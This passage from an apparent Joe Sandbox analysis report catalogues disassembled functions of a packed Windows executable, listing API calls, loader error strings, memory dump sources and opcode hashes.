                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 485612231-0
                                                                                                                                                                                                                                        • Opcode ID: 4700cc90785079b7bb7a0602c46334a4ae9c6cdcc1bc7f68a8ec9cd099c19dcc
                                                                                                                                                                                                                                        • Instruction ID: 06c9f5f90ca3a2f4b2d147d68bde127a6b59ad1dec882ada104ec033341511c5
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4700cc90785079b7bb7a0602c46334a4ae9c6cdcc1bc7f68a8ec9cd099c19dcc
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C9413632718A4581EF08DF6AE914569B3A1FB48FC4BB99432DE0D97B58EE3DC845C301
                                                                                                                                                                                                                                        Function 00007FF78DA68154 Relevance: .1, Instructions: 98COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 12404f4f4f1323fea4d4e583727f71dd7b5a0d93f2e51056eadc76cf5c92dd81
                                                                                                                                                                                                                                        • Instruction ID: 10de8b6945cb83507c0a085093c9381b34a55cac5db960aa027bf6dc3117bb8c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 12404f4f4f1323fea4d4e583727f71dd7b5a0d93f2e51056eadc76cf5c92dd81
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3731C332A0CB4281E754AF71744052EA694BB84BA0FB44239EA9D53BD5EF3CD805C315
                                                                                                                                                                                                                                        Function 00007FF78DA795E0 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: bcf48121633763fd2f6aa1741893fa818c421e56c797f7e3558f0bc07bbc94c0
                                                                                                                                                                                                                                        • Instruction ID: 9f75ebcdf39393c0ebfb282d70558a24d25536e3edd9fd10a10578a443760137
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bcf48121633763fd2f6aa1741893fa818c421e56c797f7e3558f0bc07bbc94c0
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7EF0C87571C2519ADB98DF78A802A2A77E1F7083C0FA08039D59C83B14EA3CC461DF14
                                                                                                                                                                                                                                        Function 00007FF78DA5D37C Relevance: .0, Instructions: 2COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: e6acc2ec838af36dd9636ef9e1d94249ffac8b7a33868b0b47a68aa66541c0b8
                                                                                                                                                                                                                                        • Instruction ID: 499e0fd42110caf9fdccb5f266ff4bf463625b06d34f1a7cfa703cfd9cb24177
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e6acc2ec838af36dd9636ef9e1d94249ffac8b7a33868b0b47a68aa66541c0b8
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 99A002A190DC0AD0EA44AF40E8A0875A330FB60314BF00071F05D814B0FF3CAC48D363
                                                                                                                                                                                                                                        Function 00007FF78DA55820 Relevance: 229.6, APIs: 86, Strings: 45, Instructions: 400libraryloaderCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF78DA564BF,?,00007FF78DA5336E), ref: 00007FF78DA55830
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF78DA564BF,?,00007FF78DA5336E), ref: 00007FF78DA55842
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF78DA564BF,?,00007FF78DA5336E), ref: 00007FF78DA55879
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF78DA564BF,?,00007FF78DA5336E), ref: 00007FF78DA5588B
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF78DA564BF,?,00007FF78DA5336E), ref: 00007FF78DA558A4
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF78DA564BF,?,00007FF78DA5336E), ref: 00007FF78DA558B6
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF78DA564BF,?,00007FF78DA5336E), ref: 00007FF78DA558CF
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF78DA564BF,?,00007FF78DA5336E), ref: 00007FF78DA558E1
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF78DA564BF,?,00007FF78DA5336E), ref: 00007FF78DA558FD
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF78DA564BF,?,00007FF78DA5336E), ref: 00007FF78DA5590F
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF78DA564BF,?,00007FF78DA5336E), ref: 00007FF78DA5592B
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF78DA564BF,?,00007FF78DA5336E), ref: 00007FF78DA5593D
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF78DA564BF,?,00007FF78DA5336E), ref: 00007FF78DA55959
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF78DA564BF,?,00007FF78DA5336E), ref: 00007FF78DA5596B
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF78DA564BF,?,00007FF78DA5336E), ref: 00007FF78DA55987
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF78DA564BF,?,00007FF78DA5336E), ref: 00007FF78DA55999
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF78DA564BF,?,00007FF78DA5336E), ref: 00007FF78DA559B5
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF78DA564BF,?,00007FF78DA5336E), ref: 00007FF78DA559C7
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                        • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                                                        • API String ID: 199729137-653951865
                                                                                                                                                                                                                                        • Opcode ID: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
                                                                                                                                                                                                                                        • Instruction ID: fef82d59517939dd146c14e1ff82832a8dcacd02e2e7bb97cdbdc97c2b4d5b7b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DA228D64A0DF07D1FA55FFA5A8149B4A2A1BF04785BF41035C8AE423A0FF3DAD4DD262
                                                                                                                                                                                                                                        Function 00007FF78DA581C0 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 117COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 00007FF78DA59400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF78DA545E4,00000000,00007FF78DA51985), ref: 00007FF78DA59439
                                                                                                                                                                                                                                        • ExpandEnvironmentStringsW.KERNEL32(?,00007FF78DA588A7,?,?,00000000,00007FF78DA53CBB), ref: 00007FF78DA5821C
                                                                                                                                                                                                                                          • Part of subcall function 00007FF78DA52810: MessageBoxW.USER32 ref: 00007FF78DA528EA
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                                                        • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                                                                        • API String ID: 1662231829-930877121
                                                                                                                                                                                                                                        • Opcode ID: e491f33a4545c5dc9e33b4da933e1c9d98f9a36929a11ac7b8a73595df86892f
                                                                                                                                                                                                                                        • Instruction ID: 23054a6fd8a26b0dc214830d14919f2e1e36ddfb21da7f8b43014f6db94a4899
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e491f33a4545c5dc9e33b4da933e1c9d98f9a36929a11ac7b8a73595df86892f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D951A211A2D64291EB50BBA0E851EBAE270BF94790FF44031D95EC66D5FE2CEC0DC762
                                                                                                                                                                                                                                        Function 00007FF78DA52180 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                                        • String ID: P%
                                                                                                                                                                                                                                        • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                                        • Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                        • Instruction ID: 6b2b1fd78fbbcd4b6f597d47d0c8c13f53cc20c9b6f00f659d63b7c579709318
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 295128666087A186D6349F22E4185BAF7A1F798B61F504131EFDE43694EF3CD449CB20
                                                                                                                                                                                                                                        Function 00007FF78DA580B0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: LongWindow$BlockCreateErrorLastReasonShutdown
                                                                                                                                                                                                                                        • String ID: Needs to remove its temporary files.
                                                                                                                                                                                                                                        • API String ID: 3975851968-2863640275
                                                                                                                                                                                                                                        • Opcode ID: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
                                                                                                                                                                                                                                        • Instruction ID: 5c1501fd4293f7a3c918412f29b879e5d6b3ba4b5e5a60b09422bc10f7a4dc6e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B5219C61B0CA4281E7456B79E854979E360FF84BA0FB84131DA6D837D4FE2CDD99C322
                                                                                                                                                                                                                                        Function 00007FF78DA66300 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 494COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID: -$:$f$p$p
                                                                                                                                                                                                                                        • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                                        • Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                        • Instruction ID: 2f09ab37ec8a5d9d360f20b8152a4283d9ab92a0d30c295a8c4fbd3103b4be02
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E512A366A0C143C6FB247A95B104A79B699FB40750FFC4075E69B466C8FB3CED48CB22
                                                                                                                                                                                                                                        Function 00007FF78DA61038 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID: f$f$p$p$f
                                                                                                                                                                                                                                        • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                                        • Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                        • Instruction ID: 5413a2a50a40f4f475792f6c517f06c74adb1407dca3f8da31ad62c384d1417e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2E128265E0C183C5FB60AAD5B054A79AA61FB40754FF84035E799475C4EB7CEC88CB22
                                                                                                                                                                                                                                        Function 00007FF78DA51050 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 119COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                        • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                        • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                        • Opcode ID: 7e307792341f3e13bc35d069cd8d6eb008b40c51d7a157a29d78c9294da5d9b2
                                                                                                                                                                                                                                        • Instruction ID: 339ad4c7bbc1447afa356fbb6427857611bda8e2c7b5b4302ebb97d41c84e9e5
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7e307792341f3e13bc35d069cd8d6eb008b40c51d7a157a29d78c9294da5d9b2
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CE415E61A0C65281EA10FB91E800DB9E3A0BF45B84FF44431ED4D47795EF3CE949C762
                                                                                                                                                                                                                                        Function 00007FF78DA51470 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 107COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                        • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                        • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                        • Opcode ID: 8171e7b2039391607633f9c15a315d45593e4c083ab96ebd05573d6ad0024e78
                                                                                                                                                                                                                                        • Instruction ID: 8cbe3c5390da168785e7f66b97b79bb2c6dbf31273a18dd801e5468cb0ed9784
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8171e7b2039391607633f9c15a315d45593e4c083ab96ebd05573d6ad0024e78
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C3417161A0C64285EA10EBA1E4409B9F3A0BF44B94FF44832ED5E47795FF7CE949C722
                                                                                                                                                                                                                                        Function 00007FF78DA5EA78 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
